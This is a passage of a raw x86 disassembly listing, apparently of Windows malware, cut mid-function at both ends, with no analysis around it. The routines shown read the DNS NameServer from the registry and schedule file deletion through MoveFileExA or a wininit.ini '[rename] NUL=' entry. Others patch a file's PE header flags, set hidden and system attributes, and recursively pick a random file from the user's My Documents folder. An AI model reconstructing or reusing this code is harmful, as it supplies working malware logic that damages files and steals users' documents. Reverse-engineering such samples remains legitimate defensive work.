361714CD mov al, [esi] 361714CF test al, al 361714D1 jz short loc_3617152E 361714D3 test al, 0C0h 361714D5 jz short loc_361714FE 361714D7 mov ax, [esi] 361714DA and ax, 0FF3Fh 361714DE push eax 361714DF call dword_3617AC34 361714E5 movzx esi, ax 361714E8 add esi, [ebp+arg_0] 361714EB cmp [ebp+var_4], 0 361714EF jnz short loc_361714CD 361714F1 add [ebp+arg_8], 2 361714F5 mov [ebp+var_4], 1 361714FC jmp short loc_361714CD 361714FE ; ─────────────────────────────────────────────────────────────────────────── 361714FE 361714FE loc_361714FE: ; CODE XREF: sub_3617148E+47j 361714FE movzx edi, al 36171501 lea eax, [esi+1] 36171504 push edi 36171505 push eax 36171506 push ebx 36171507 call _memcpy 3617150C lea eax, [edi+ebx] 3617150F add esp, 0Ch 36171512 cmp dword ptr [ebp-4], 0 36171516 mov byte ptr [eax], 2Eh 36171519 lea ebx, [eax+1] 3617151C jnz short loc_36171528 3617151E mov eax, [ebp+10h] 36171521 lea eax, [eax+edi+1] 36171525 mov [ebp+10h], eax 36171528 36171528 loc_36171528: ; CODE XREF: sub_3617148E+8Ej 36171528 lea esi, [esi+edi+1] 3617152C jmp short loc_361714CD 3617152E ; ─────────────────────────────────────────────────────────────────────────── 3617152E 3617152E loc_3617152E: ; CODE XREF: sub_3617148E+43j 3617152E and byte ptr [ebx], 0 36171531 cmp dword ptr [ebp-4], 0 36171535 mov eax, [ebp+10h] 36171538 pop edi 36171539 pop esi 3617153A pop ebx 3617153B jnz short locret_3617153E 3617153D inc eax 3617153E 3617153E locret_3617153E: ; CODE XREF: sub_3617148E+ADj 3617153E leave 3617153F retn 3617153F sub_3617148E endp 3617153F 36171540 36171540 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36171540 36171540 ; Attributes: bp-based frame 36171540 36171540 sub_36171540 proc near ; CODE XREF: sub_3617131A+B2p 36171540 36171540 arg_0 = dword ptr 8 36171540 arg_4 = dword ptr 0Ch 36171540 arg_8 = dword ptr 10h 36171540 arg_C = dword ptr 14h 36171540 arg_10 = dword ptr 18h 36171540 36171540 push ebp 36171541 mov ebp, esp 36171543 push 
ebx 36171544 push esi 36171545 mov esi, [ebp+0Ch] 36171548 push edi 36171549 push dword ptr [ebp+10h] 3617154C push esi 3617154D push dword ptr [ebp+8] 36171550 call sub_3617148E 36171555 mov ebx, [ebp+14h] 36171558 mov edi, eax 3617155A add esp, 0Ch 3617155D add esi, edi 3617155F test ebx, ebx 36171561 jz short loc_36171570 36171563 mov ax, [esi] 36171566 push eax 36171567 call dword_3617AC34 3617156D mov [ebx], ax 36171570 36171570 loc_36171570: ; CODE XREF: sub_36171540+21j 36171570 mov ebx, [ebp+arg_10] 36171573 inc edi 36171574 inc edi 36171575 test ebx, ebx 36171577 jz short loc_36171587 36171579 mov ax, [esi+2] 3617157D push eax 3617157E call dword_3617AC34 36171584 mov [ebx], ax 36171587 36171587 loc_36171587: ; CODE XREF: sub_36171540+37j 36171587 lea eax, [edi+2] 3617158A pop edi 3617158B pop esi 3617158C pop ebx 3617158D pop ebp 3617158E retn 3617158E sub_36171540 endp ; sp = -8 3617158E 3617158F 3617158F ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 3617158F 3617158F ; Attributes: bp-based frame 3617158F 3617158F sub_3617158F proc near ; CODE XREF: sub_3617131A+E5p 3617158F 3617158F arg_0 = dword ptr 8 3617158F arg_4 = dword ptr 0Ch 3617158F arg_8 = dword ptr 10h 3617158F 3617158F push ebp 36171590 mov ebp, esp 36171592 push ebx 36171593 push esi 36171594 mov esi, [ebp+arg_8] 36171597 push edi 36171598 test esi, esi 3617159A jz short loc_361715AC 3617159C push 20Ch 361715A1 push 0 361715A3 push esi 361715A4 call _memset 361715A9 add esp, 0Ch 361715AC 361715AC loc_361715AC: ; CODE XREF: sub_3617158F+Bj 361715AC mov edi, [ebp+arg_4] 361715AF push esi 361715B0 push edi 361715B1 push [ebp+arg_0] 361715B4 call sub_3617148E 361715B9 mov ebx, eax 361715BB add esp, 0Ch 361715BE add edi, ebx 361715C0 test esi, esi 361715C2 jz short loc_361715D5 361715C4 mov ax, [edi] 361715C7 push eax 361715C8 call dword_3617AC34 361715CE mov [esi+100h], ax 361715D5 361715D5 loc_361715D5: ; CODE XREF: sub_3617158F+33j 361715D5 inc edi 361715D6 inc 
edi 361715D7 inc ebx 361715D8 inc ebx 361715D9 test esi, esi 361715DB jz short loc_361715EE 361715DD mov ax, [edi] 361715E0 push eax 361715E1 call dword_3617AC34 361715E7 mov [esi+102h], ax 361715EE 361715EE loc_361715EE: ; CODE XREF: sub_3617158F+4Cj 361715EE inc edi 361715EF inc edi 361715F0 inc ebx 361715F1 inc ebx 361715F2 test esi, esi 361715F4 jz short loc_36171604 361715F6 push dword ptr [edi] 361715F8 call dword_3617AC30 361715FE mov [esi+104h], eax 36171604 36171604 loc_36171604: ; CODE XREF: sub_3617158F+65j 36171604 mov ax, [edi+4] 36171608 add edi, 4 3617160B push eax 3617160C add ebx, 4 3617160F call dword_3617AC34 36171615 test esi, esi 36171617 mov [ebp+arg_8], eax 3617161A jz short loc_36171623 3617161C mov [esi+108h], ax 36171623 36171623 loc_36171623: ; CODE XREF: sub_3617158F+8Bj 36171623 inc ebx 36171624 inc ebx 36171625 test esi, esi 36171627 jz short loc_36171640 36171629 movzx eax, ax 3617162C add edi, 2 3617162F push eax 36171630 add esi, 10Ah 36171636 push edi 36171637 push esi 36171638 call _memcpy 3617163D add esp, 0Ch 36171640 36171640 loc_36171640: ; CODE XREF: sub_3617158F+98j 36171640 movzx eax, word ptr [ebp+arg_8] 36171644 pop edi 36171645 add eax, ebx 36171647 pop esi 36171648 pop ebx 36171649 pop ebp 3617164A retn 3617164A sub_3617158F endp ; sp = -10h 3617164A 3617164B 3617164B ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 3617164B 3617164B ; Attributes: bp-based frame 3617164B 3617164B sub_3617164B proc near ; CODE XREF: sub_361766AC+9p 3617164B 3617164B var_698 = byte ptr -698h 3617164B var_298 = byte ptr -298h 3617164B var_198 = byte ptr -198h 3617164B var_98 = byte ptr -98h 3617164B var_18 = dword ptr -18h 3617164B var_14 = dword ptr -14h 3617164B var_10 = dword ptr -10h 3617164B var_C = dword ptr -0Ch 3617164B var_8 = dword ptr -8 3617164B var_4 = dword ptr -4 3617164B 3617164B push ebp 3617164C mov ebp, esp 3617164E sub esp, 698h 36171654 push ebx 36171655 xor ebx, ebx 36171657 cmp 
dword_3617ACB0, ebx 3617165D mov [ebp+var_98], bl 36171663 jz loc_361717BB 36171669 lea eax, [ebp+var_18] 3617166C mov [ebp+var_18], ebx 3617166F push eax 36171670 lea eax, [ebp+var_4] 36171673 push eax 36171674 push ebx 36171675 push 0F003Fh 3617167A push ebx 3617167B push ebx 3617167C push ebx 3617167D push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Services\\Tcpip"... 36171682 push 80000002h 36171687 call ds:RegCreateKeyExA 3617168D test eax, eax 3617168F jnz loc_3617184E 36171695 push esi 36171696 push ebx 36171697 push ebx 36171698 push ebx 36171699 lea eax, [ebp+var_14] 3617169C mov esi, ds:RegEnumKeyExA 361716A2 push ebx 361716A3 push eax 361716A4 lea eax, [ebp+var_298] 361716AA mov [ebp+var_14], 0FFh 361716B1 push eax 361716B2 push ebx 361716B3 push [ebp+var_4] 361716B6 mov [ebp+var_C], ebx 361716B9 361716B9 loc_361716B9: ; CODE XREF: sub_3617164B+120j 361716B9 call esi ; RegEnumKeyExA 361716BB test eax, eax 361716BD jnz loc_361717AC 361716C3 lea eax, [ebp+var_198] 361716C9 push offset aSystemCurren_0 ; "SYSTEM\\CurrentControlSet\\Services\\Tcpip"... 
361716CE push eax 361716CF call _strcpy 361716D4 lea eax, [ebp+var_298] 361716DA push eax 361716DB lea eax, [ebp+var_198] 361716E1 push eax 361716E2 call _strcat 361716E7 add esp, 10h 361716EA lea eax, [ebp+var_8] 361716ED push eax 361716EE push 0F003Fh 361716F3 lea eax, [ebp+var_198] 361716F9 push ebx 361716FA push eax 361716FB push 80000002h 36171700 call ds:RegOpenKeyExA 36171706 test eax, eax 36171708 jnz short loc_3617174C 3617170A lea eax, [ebp+var_10] 3617170D mov [ebp+var_10], 400h 36171714 push eax 36171715 lea eax, [ebp+var_698] 3617171B push eax 3617171C push ebx 3617171D push ebx 3617171E push offset aNameserver ; "NameServer" 36171723 push [ebp+var_8] 36171726 mov [ebp+var_698], bl 3617172C call ds:RegQueryValueExA 36171732 lea eax, [ebp+var_698] 36171738 push eax 36171739 call _strlen 3617173E test eax, eax 36171740 pop ecx 36171741 jnz short loc_36171770 36171743 push [ebp+var_8] 36171746 call ds:RegCloseKey 3617174C 3617174C loc_3617174C: ; CODE XREF: sub_3617164B+BDj 3617174C inc [ebp+var_C] 3617174F push ebx 36171750 push ebx 36171751 push ebx 36171752 lea eax, [ebp+var_14] 36171755 push ebx 36171756 push eax 36171757 lea eax, [ebp+var_298] 3617175D push eax 3617175E mov [ebp+var_14], 0FFh 36171765 push [ebp+var_C] 36171768 push [ebp+var_4] 3617176B jmp loc_361716B9 36171770 ; ─────────────────────────────────────────────────────────────────────────── 36171770 36171770 loc_36171770: ; CODE XREF: sub_3617164B+F6j 36171770 lea eax, [ebp+var_698] 36171776 push 2Ch 36171778 push eax 36171779 call ds:strchr 3617177F pop ecx 36171780 cmp eax, ebx 36171782 pop ecx 36171783 jz short loc_36171787 36171785 mov [eax], bl 36171787 36171787 loc_36171787: ; CODE XREF: sub_3617164B+138j 36171787 lea eax, [ebp+var_698] 3617178D push 80h 36171792 push eax 36171793 lea eax, [ebp+var_98] 36171799 push eax 3617179A call ds:strncpy 361717A0 add esp, 0Ch 361717A3 push [ebp+var_8] 361717A6 call ds:RegCloseKey 361717AC 361717AC loc_361717AC: ; CODE XREF: sub_3617164B+72j 
361717AC push [ebp+var_4] 361717AF call ds:RegCloseKey 361717B5 pop esi 361717B6 jmp loc_3617184E 361717BB ; ─────────────────────────────────────────────────────────────────────────── 361717BB 361717BB loc_361717BB: ; CODE XREF: sub_3617164B+18j 361717BB lea eax, [ebp+var_4] 361717BE push eax 361717BF push 0F003Fh 361717C4 push ebx 361717C5 push offset aSystemCurren_1 ; "System\\CurrentControlSet\\Services\\VxD\\M"... 361717CA push 80000002h 361717CF call ds:RegOpenKeyExA 361717D5 test eax, eax 361717D7 jnz short loc_3617184E 361717D9 lea eax, [ebp+var_10] 361717DC mov [ebp+var_10], 400h 361717E3 push eax 361717E4 lea eax, [ebp+var_698] 361717EA push eax 361717EB push ebx 361717EC push ebx 361717ED push offset aNameserver ; "NameServer" 361717F2 push [ebp+var_4] 361717F5 mov [ebp+var_698], bl 361717FB call ds:RegQueryValueExA 36171801 lea eax, [ebp+var_698] 36171807 push eax 36171808 call _strlen 3617180D test eax, eax 3617180F pop ecx 36171810 jz short loc_36171845 36171812 lea eax, [ebp+var_698] 36171818 push 2Ch 3617181A push eax 3617181B call ds:strchr 36171821 pop ecx 36171822 cmp eax, ebx 36171824 pop ecx 36171825 jz short loc_36171829 36171827 mov [eax], bl 36171829 36171829 loc_36171829: ; CODE XREF: sub_3617164B+1DAj 36171829 lea eax, [ebp+var_698] 3617182F push 80h 36171834 push eax 36171835 lea eax, [ebp+var_98] 3617183B push eax 3617183C call ds:strncpy 36171842 add esp, 0Ch 36171845 36171845 loc_36171845: ; CODE XREF: sub_3617164B+1C5j 36171845 push [ebp+var_4] 36171848 call ds:RegCloseKey 3617184E 3617184E loc_3617184E: ; CODE XREF: sub_3617164B+44j 3617184E ; sub_3617164B+16Bj ... 
3617184E cmp [ebp+var_98], bl 36171854 pop ebx 36171855 jz short loc_36171869 36171857 lea eax, [ebp+var_98] 3617185D push eax 3617185E call dword_3617AC28 36171864 mov dword_3617A410, eax 36171869 36171869 loc_36171869: ; CODE XREF: sub_3617164B+20Aj 36171869 push 1 3617186B pop eax 3617186C leave 3617186D retn 3617186D sub_3617164B endp 3617186D 3617186E 3617186E ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 3617186E 3617186E 3617186E sub_3617186E proc near ; CODE XREF: sub_36171B36+3Ap 3617186E ; sub_3617339F+47p ... 3617186E 3617186E arg_0 = dword ptr 8 3617186E 3617186E push esi 3617186F mov esi, [esp+arg_0] 36171873 test esi, esi 36171875 jz short loc_3617188D 36171877 push esi 36171878 call _strlen 3617187D test eax, eax 3617187F pop ecx 36171880 jz short loc_3617188D 36171882 cmp byte ptr [eax+esi-1], 5Ch 36171887 lea eax, [eax+esi-1] 3617188B jz short loc_36171891 3617188D 3617188D loc_3617188D: ; CODE XREF: sub_3617186E+7j 3617188D ; sub_3617186E+12j 3617188D xor eax, eax 3617188F pop esi 36171890 retn 36171891 ; ─────────────────────────────────────────────────────────────────────────── 36171891 36171891 loc_36171891: ; CODE XREF: sub_3617186E+1Dj 36171891 and byte ptr [eax], 0 36171894 push 1 36171896 pop eax 36171897 pop esi 36171898 retn 36171898 sub_3617186E endp 36171898 36171899 36171899 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36171899 36171899 ; Attributes: bp-based frame 36171899 36171899 sub_36171899 proc near ; CODE XREF: sub_36174125+1DCp 36171899 ; sub_36176511+18Dp ... 
36171899 36171899 var_404 = byte ptr -404h 36171899 var_4 = byte ptr -4 36171899 arg_0 = dword ptr 8 36171899 36171899 push ebp 3617189A mov ebp, esp 3617189C sub esp, 404h 361718A2 push ebx 361718A3 push edi 361718A4 xor edi, edi 361718A6 cmp dword_3617ACB0, edi 361718AC jz short loc_361718C2 361718AE push 4 361718B0 push edi 361718B1 push [ebp+arg_0] 361718B4 call ds:MoveFileExA 361718BA push 1 361718BC pop eax 361718BD jmp loc_3617199F 361718C2 ; ─────────────────────────────────────────────────────────────────────────── 361718C2 361718C2 loc_361718C2: ; CODE XREF: sub_36171899+13j 361718C2 lea eax, [ebp+var_404] 361718C8 push offset byte_3617B0B8 361718CD push eax 361718CE call _strcpy 361718D3 lea eax, [ebp+var_404] 361718D9 push offset wininit_ini ; "\\wininit.ini" 361718DE push eax 361718DF call _strcat 361718E4 add esp, 10h 361718E7 lea eax, [ebp+var_404] 361718ED push edi 361718EE push 80h 361718F3 push 4 361718F5 push edi 361718F6 push edi 361718F7 push 40000000h 361718FC push eax 361718FD call ds:CreateFileA 36171903 mov ebx, eax 36171905 cmp ebx, 0FFFFFFFFh 36171908 jz loc_3617199D 3617190E push esi 3617190F push 2 36171911 push edi 36171912 push edi 36171913 push ebx 36171914 call ds:SetFilePointer 3617191A lea eax, [ebp+var_404] 36171920 push offset aRename ; "\r\n\r\n[rename]\r\n" 36171925 push eax 36171926 call _strcpy 3617192B pop ecx 3617192C lea eax, [ebp+var_4] 3617192F pop ecx 36171930 push edi 36171931 push eax 36171932 lea eax, [ebp+var_404] 36171938 push eax 36171939 call _strlen 3617193E mov esi, ds:WriteFile 36171944 pop ecx 36171945 push eax 36171946 lea eax, [ebp+var_404] 3617194C push eax 3617194D push ebx 3617194E call esi ; WriteFile 36171950 lea eax, [ebp+var_404] 36171956 push offset NUL_equals ; "NUL=" 3617195B push eax 3617195C call _strcpy 36171961 push [ebp+arg_0] 36171964 lea eax, [ebp+var_404] 3617196A push eax 3617196B call _strcat 36171970 add esp, 10h 36171973 lea eax, [ebp+var_4] 36171976 push edi 36171977 push eax 
36171978 lea eax, [ebp+var_404] 3617197E push eax 3617197F call _strlen 36171984 pop ecx 36171985 push eax 36171986 lea eax, [ebp+var_404] 3617198C push eax 3617198D push ebx 3617198E call esi ; WriteFile 36171990 push ebx 36171991 call ds:CloseHandle 36171997 push 1 36171999 pop eax 3617199A pop esi 3617199B jmp short loc_3617199F 3617199D ; ─────────────────────────────────────────────────────────────────────────── 3617199D 3617199D loc_3617199D: ; CODE XREF: sub_36171899+6Fj 3617199D xor eax, eax 3617199F 3617199F loc_3617199F: ; CODE XREF: sub_36171899+24j 3617199F ; sub_36171899+102j 3617199F pop edi 361719A0 pop ebx 361719A1 leave 361719A2 retn 361719A2 sub_36171899 endp 361719A2 361719A3 361719A3 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 361719A3 361719A3 ; Attributes: bp-based frame 361719A3 361719A3 sub_361719A3 proc near ; CODE XREF: sub_36176511+11Dp 361719A3 ; sub_361766AC+8Fp ... 361719A3 361719A3 var_140 = byte ptr -140h 361719A3 var_12A = word ptr -12Ah 361719A3 var_48 = byte ptr -48h 361719A3 var_C = dword ptr -0Ch 361719A3 var_8 = dword ptr -8 361719A3 var_4 = dword ptr -4 361719A3 arg_0 = dword ptr 8 361719A3 arg_4 = dword ptr 0Ch 361719A3 361719A3 push ebp 361719A4 mov ebp, esp 361719A6 sub esp, 140h 361719AC push esi 361719AD push edi 361719AE push 80h 361719B3 push [ebp+arg_0] 361719B6 call ds:SetFileAttributesA 361719BC xor esi, esi 361719BE push esi 361719BF push esi 361719C0 push 3 361719C2 push esi 361719C3 push esi 361719C4 push 0C0000000h 361719C9 push [ebp+arg_0] 361719CC call ds:CreateFileA 361719D2 mov edi, eax 361719D4 cmp edi, 0FFFFFFFFh 361719D7 mov [ebp+var_8], edi 361719DA jnz short loc_361719E3 361719DC xor eax, eax 361719DE jmp loc_36171A77 361719E3 ; ─────────────────────────────────────────────────────────────────────────── 361719E3 361719E3 loc_361719E3: ; CODE XREF: sub_361719A3+37j 361719E3 push ebx 361719E4 lea eax, [ebp+var_4] 361719E7 push esi 361719E8 push eax 361719E9 lea eax, 
[ebp+var_48] 361719EC push 40h 361719EE push eax 361719EF push edi 361719F0 mov [ebp+var_4], esi 361719F3 call ds:ReadFile 361719F9 push esi 361719FA push esi 361719FB push [ebp+var_C] 361719FE push edi 361719FF mov edi, ds:SetFilePointer 36171A05 call edi ; SetFilePointer 36171A07 lea eax, [ebp+var_4] 36171A0A push esi 36171A0B push eax 36171A0C mov ebx, 0F8h 36171A11 lea eax, [ebp+var_140] 36171A17 push ebx 36171A18 push eax 36171A19 mov [ebp+var_4], esi 36171A1C push [ebp+var_8] 36171A1F call ds:ReadFile 36171A25 cmp [ebp+arg_4], esi 36171A28 jz short loc_36171A35 36171A2A and [ebp+var_12A], 0DFFFh 36171A33 jmp short loc_36171A3C 36171A35 ; ─────────────────────────────────────────────────────────────────────────── 36171A35 36171A35 loc_36171A35: ; CODE XREF: sub_361719A3+85j 36171A35 or byte ptr [ebp+var_12A+1], 20h 36171A3C 36171A3C loc_36171A3C: ; CODE XREF: sub_361719A3+90j 36171A3C push esi 36171A3D push esi 36171A3E push [ebp+var_C] 36171A41 push [ebp+var_8] 36171A44 call edi ; SetFilePointer 36171A46 lea eax, [ebp+var_4] 36171A49 push esi 36171A4A push eax 36171A4B lea eax, [ebp+var_140] 36171A51 push ebx 36171A52 push eax 36171A53 push [ebp+var_8] 36171A56 mov [ebp+var_4], esi 36171A59 call ds:WriteFile 36171A5F push [ebp+var_8] 36171A62 call ds:CloseHandle 36171A68 push 26h 36171A6A push [ebp+arg_0] 36171A6D call ds:SetFileAttributesA 36171A73 push 1 36171A75 pop eax 36171A76 pop ebx 36171A77 36171A77 loc_36171A77: ; CODE XREF: sub_361719A3+3Bj 36171A77 pop edi 36171A78 pop esi 36171A79 leave 36171A7A retn 36171A7A sub_361719A3 endp 36171A7A 36171A7B 36171A7B ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36171A7B 36171A7B ; Attributes: bp-based frame 36171A7B 36171A7B sub_36171A7B proc near ; CODE XREF: sub_36174374+Ap 36171A7B ; sub_36175F1C+13p 36171A7B 36171A7B var_208 = byte ptr -208h 36171A7B var_8 = dword ptr -8 36171A7B var_4 = dword ptr -4 36171A7B 36171A7B push ebp 36171A7C mov ebp, esp 36171A7E sub esp, 208h 
36171A84 lea eax, [ebp+var_4] 36171A87 push esi 36171A88 xor esi, esi 36171A8A push eax 36171A8B push 0F003Fh 36171A90 push esi 36171A91 push offset aSoftwareMicros ; "Software\\Microsoft\\Windows\\CurrentVersi"... 36171A96 push 80000001h 36171A9B mov [ebp+var_8], 1FFh 36171AA2 call ds:RegOpenKeyExA 36171AA8 test eax, eax 36171AAA jz short loc_36171AAF 36171AAC push 1 36171AAE pop esi 36171AAF 36171AAF loc_36171AAF: ; CODE XREF: sub_36171A7B+2Fj 36171AAF lea eax, [ebp+var_8] 36171AB2 push eax 36171AB3 lea eax, [ebp+var_208] 36171AB9 push eax 36171ABA push 0 36171ABC push 0 36171ABE push offset aPersonal ; "Personal" 36171AC3 push [ebp+var_4] 36171AC6 call ds:RegQueryValueExA 36171ACC test eax, eax 36171ACE jz short loc_36171AD3 36171AD0 push 1 36171AD2 pop esi 36171AD3 36171AD3 loc_36171AD3: ; CODE XREF: sub_36171A7B+53j 36171AD3 test esi, esi 36171AD5 pop esi 36171AD6 jz short loc_36171AEB 36171AD8 lea eax, [ebp+var_208] 36171ADE push offset aC ; "C:\\" 36171AE3 push eax 36171AE4 call _strcpy 36171AE9 pop ecx 36171AEA pop ecx 36171AEB 36171AEB loc_36171AEB: ; CODE XREF: sub_36171A7B+5Bj 36171AEB push [ebp+var_4] 36171AEE call ds:RegCloseKey 36171AF4 lea eax, [ebp+var_208] 36171AFA push eax 36171AFB call random_numgen 36171B00 pop ecx 36171B01 push 1 36171B03 pop eax 36171B04 leave 36171B05 retn 36171B05 sub_36171A7B endp 36171B05 36171B06 36171B06 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36171B06 36171B06 36171B06 random_numgen proc near ; CODE XREF: sub_36171A7B+80p 36171B06 36171B06 arg_0 = dword ptr 4 36171B06 36171B06 call ds:rand 36171B0C imul eax, 64h 36171B0F cdq 36171B10 mov ecx, 7FFFh 36171B15 idiv ecx 36171B17 inc eax 36171B18 mov dword_3617D4B8, eax 36171B1D 36171B1D loc_36171B1D: ; CODE XREF: random_numgen+24j 36171B1D push [esp+arg_0] 36171B21 call sub_36171B36 36171B26 cmp eax, 63h 36171B29 pop ecx 36171B2A jz short loc_36171B1D 36171B2C xor ecx, ecx 36171B2E test eax, eax 36171B30 setnz cl 36171B33 mov eax, ecx 
36171B35 retn 36171B35 random_numgen endp 36171B35 36171B36 36171B36 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36171B36 36171B36 ; Attributes: bp-based frame 36171B36 36171B36 sub_36171B36 proc near ; CODE XREF: random_numgen+1Bp 36171B36 ; sub_36171B36+F1p ... 36171B36 36171B36 var_164 = dword ptr -164h 36171B36 var_148 = byte ptr -148h 36171B36 var_11C = byte ptr -11Ch 36171B36 var_8 = dword ptr -8 36171B36 var_4 = dword ptr -4 36171B36 arg_0 = dword ptr 8 36171B36 36171B36 push ebp 36171B37 mov ebp, esp 36171B39 sub esp, 148h 36171B3F push ebx 36171B40 push esi 36171B41 and [ebp+var_4], 0 36171B45 mov esi, 400h 36171B4A push esi 36171B4B push 8 36171B4D push dword_3617ACB4 36171B53 call dword_3617AC74 36171B59 mov ebx, eax 36171B5B test ebx, ebx 36171B5D jz loc_36171D3F 36171B63 push edi 36171B64 push esi 36171B65 push [ebp+arg_0] 36171B68 push ebx 36171B69 call ds:strncpy 36171B6F push ebx 36171B70 call sub_3617186E 36171B75 push [ebp+arg_0] 36171B78 call _strlen 36171B7D mov edi, ds:strncat 36171B83 mov ecx, esi 36171B85 sub ecx, eax 36171B87 push ecx 36171B88 push offset a_ ; "\\*.*" 36171B8D push ebx 36171B8E call edi ; strncat 36171B90 add esp, 20h 36171B93 lea eax, [ebp+var_148] 36171B99 push eax 36171B9A push ebx 36171B9B call ds:FindFirstFileA 36171BA1 cmp eax, 0FFFFFFFFh 36171BA4 mov [ebp+var_8], eax 36171BA7 jnz short loc_36171BB0 36171BA9 xor esi, esi 36171BAB jmp loc_36171D2D 36171BB0 ; ─────────────────────────────────────────────────────────────────────────── 36171BB0 36171BB0 loc_36171BB0: ; CODE XREF: sub_36171B36+71j 36171BB0 lea eax, [ebp+var_11C] 36171BB6 push eax 36171BB7 call ds:_strlwr 36171BBD lea eax, [ebp+var_11C] 36171BC3 mov [esp+164h+var_164], offset dot ; "." 36171BCA push eax 36171BCB call _strcmp 36171BD0 pop ecx 36171BD1 test eax, eax 36171BD3 pop ecx 36171BD4 jz loc_36171C75 36171BDA lea eax, [ebp+var_11C] 36171BE0 push offset a__ ; ".." 
36171BE5 push eax 36171BE6 call _strcmp 36171BEB pop ecx 36171BEC test eax, eax 36171BEE pop ecx 36171BEF jz loc_36171C75 36171BF5 test [ebp+var_148], 10h 36171BFC jz short loc_36171C40 36171BFE push ebx 36171BFF call _strlen 36171C04 mov ecx, esi 36171C06 sub ecx, eax 36171C08 push ecx 36171C09 push offset asc_36179474 ; "\\" 36171C0E push ebx 36171C0F call edi ; strncat 36171C11 push ebx 36171C12 call _strlen 36171C17 mov ecx, esi 36171C19 sub ecx, eax 36171C1B lea eax, [ebp+var_11C] 36171C21 push ecx 36171C22 push eax 36171C23 push ebx 36171C24 call edi ; strncat 36171C26 push ebx 36171C27 call sub_36171B36 36171C2C add esp, 24h 36171C2F jmp loc_36171D13 36171C34 ; ─────────────────────────────────────────────────────────────────────────── 36171C34 36171C34 loc_36171C34: ; CODE XREF: sub_36171B36+1E2j 36171C34 push 63h 36171C36 pop ecx 36171C37 cmp eax, ecx 36171C39 jnz short loc_36171C75 36171C3B mov [ebp+var_4], ecx 36171C3E jmp short loc_36171C75 36171C40 ; ─────────────────────────────────────────────────────────────────────────── 36171C40 36171C40 loc_36171C40: ; CODE XREF: sub_36171B36+C6j 36171C40 ; sub_36171B36+19Bj 36171C40 lea eax, [ebp+var_11C] 36171C46 push eax 36171C47 call _strlen 36171C4C cmp eax, 4 36171C4F pop ecx 36171C50 jbe short loc_36171C75 36171C52 lea eax, [ebp+var_11C] 36171C58 push eax 36171C59 push [ebp+arg_0] 36171C5C call sub_36171D43 36171C61 pop ecx 36171C62 pop ecx 36171C63 push 1 36171C65 pop ecx 36171C66 cmp eax, ecx 36171C68 jz loc_36171D1E 36171C6E mov [ebp+var_4], 63h 36171C75 36171C75 loc_36171C75: ; CODE XREF: sub_36171B36+9Ej 36171C75 ; sub_36171B36+B9j ... 36171C75 lea eax, [ebp+var_148] 36171C7B push eax 36171C7C push [ebp+var_8] 36171C7F call ds:FindNextFileA 36171C85 test eax, eax 36171C87 jz loc_36171D21 36171C8D lea eax, [ebp+var_11C] 36171C93 push eax 36171C94 call ds:_strlwr 36171C9A lea eax, [ebp+var_11C] 36171CA0 mov [esp+164h+var_164], offset dot ; "." 
36171CA7 push eax 36171CA8 call _strcmp 36171CAD pop ecx 36171CAE test eax, eax 36171CB0 pop ecx 36171CB1 jz short loc_36171C75 36171CB3 lea eax, [ebp+var_11C] 36171CB9 push offset a__ ; ".." 36171CBE push eax 36171CBF call _strcmp 36171CC4 pop ecx 36171CC5 test eax, eax 36171CC7 pop ecx 36171CC8 jz short loc_36171C75 36171CCA test [ebp+var_148], 10h 36171CD1 jz loc_36171C40 36171CD7 push esi 36171CD8 push [ebp+arg_0] 36171CDB push ebx 36171CDC call ds:strncpy 36171CE2 push ebx 36171CE3 call _strlen 36171CE8 mov ecx, esi 36171CEA sub ecx, eax 36171CEC push ecx 36171CED push offset asc_36179474 ; "\\" 36171CF2 push ebx 36171CF3 call edi 36171CF5 push ebx 36171CF6 call _strlen 36171CFB mov ecx, esi 36171CFD sub ecx, eax 36171CFF lea eax, [ebp+var_11C] 36171D05 push ecx 36171D06 push eax 36171D07 push ebx 36171D08 call edi 36171D0A push ebx 36171D0B call sub_36171B36 36171D10 add esp, 30h 36171D13 36171D13 loc_36171D13: ; CODE XREF: sub_36171B36+F9j 36171D13 push 1 36171D15 pop ecx 36171D16 cmp eax, ecx 36171D18 jnz loc_36171C34 36171D1E 36171D1E loc_36171D1E: ; CODE XREF: sub_36171B36+132j 36171D1E mov [ebp+var_4], ecx 36171D21 36171D21 loc_36171D21: ; CODE XREF: sub_36171B36+151j 36171D21 push [ebp+var_8] 36171D24 call ds:FindClose 36171D2A mov esi, [ebp+var_4] 36171D2D 36171D2D loc_36171D2D: ; CODE XREF: sub_36171B36+75j 36171D2D push ebx 36171D2E push 0 36171D30 push dword_3617ACB4 36171D36 call dword_3617AC70 36171D3C mov eax, esi 36171D3E pop edi 36171D3F 36171D3F loc_36171D3F: ; CODE XREF: sub_36171B36+27j 36171D3F pop esi 36171D40 pop ebx 36171D41 leave 36171D42 retn 36171D42 sub_36171B36 endp 36171D42 36171D43 36171D43 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36171D43 36171D43 36171D43 sub_36171D43 proc near ; CODE XREF: sub_36171B36+126p 36171D43 36171D43 arg_0 = dword ptr 4 36171D43 arg_4 = dword ptr 8 36171D43 36171D43 dec dword_3617D4B8 36171D49 jns short loc_36171D79 36171D4B push esi 36171D4C push edi 36171D4D mov 
